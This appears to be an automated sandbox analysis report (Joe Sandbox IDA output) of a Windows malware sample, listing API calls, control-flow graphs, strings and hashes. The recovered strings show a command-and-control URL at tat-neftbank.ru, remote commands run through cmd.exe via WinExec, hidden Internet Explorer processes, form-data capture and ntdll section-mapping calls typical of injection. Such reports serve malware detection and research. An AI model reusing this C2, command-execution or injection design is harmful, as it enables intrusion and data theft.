                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE

                            Control-flow Graph

                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 400 406941-406970 sscanf 397->400 398->390 406 406a84-406aa7 atoi 398->406 402 406972-406995 rand 400->402 403 40699b-4069a2 400->403 402->390 402->403 404 4069a4-4069d9 sprintf * 2 403->404 405 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->405 407 406a27-406a61 DeleteFileA sprintf WinExec 404->407 405->407 406->390 408 406aad-406aef sprintf call 407a04 lstrlenA 406->408 407->398 411 406b17-406b1e 408->411 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
